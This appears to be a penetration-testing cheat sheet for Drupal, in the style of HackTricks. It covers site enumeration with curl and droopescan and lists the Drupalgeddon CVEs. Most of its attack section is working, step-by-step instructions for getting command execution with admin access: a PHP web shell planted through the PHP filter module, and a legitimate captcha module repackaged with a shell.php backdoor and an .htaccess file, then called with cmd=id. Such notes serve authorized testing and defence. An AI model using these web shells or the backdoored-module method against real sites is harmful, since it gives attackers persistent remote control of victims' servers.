Drupal

Introduction

---

Drupal | HackTricks

Enumeration

---

Footprinting:

curl -s http://<url> | grep Drupal

Version Enumeration:

curl -s http://<url>/CHANGELOG.txt | grep -m2 ""

• Would not work on later versions of Drupal.

Automated Scan:

droopescan:

droopescan scan drupal --url http://<url>

Attacking Drupal

---

Require Admin access.

PHP Filter Module:

Before version 8:

It is possible to login as admin and enable the PHP filer module to allow embedded PHP codes to be executed.

• Under Module. Then save configuration

Then we can create a new page under Content, and place our web shell code:

system($_GET[cmd]);

• Then visit the php page with ?cmd=<command>

• Make suer the Text format drop down is set to PHP Code.

After version 8:

We would have to install the module ourselves by uploading the module archive.

https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

Uploading a Backdoored Module:

Download and extract a normal module:

wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz

tar xvf captcha-8.x-1.2.tar.gz

Create a php web shell:

<?php
system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);
?>

Create a .htaccess file:

Drupal in default does not allow access to /module folder.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

Move all files into the Module and Create an archive:

mv shell.php .htaccess captcha

tar cvf captcha.tar.gz captcha/

• Then install this new module on Drupal.

Executing the web shell:

curl -s <url>/modules/captcha/shell.php?cmd=id

Known Vulnerabilities:

• Versions 7.0 up to 7.31 - CVE-2014-3704 (Drupalgeddon) Pre-auth SQL injection

• Versions 7.58 to 8.5 - CVE-2018-7600 (Drupalgeddon2) Remote Code Execution

• Multiple Versions 7.x and 8.x. - CVE-2018-7602 (Drupalgeddon3) Remote Code Execution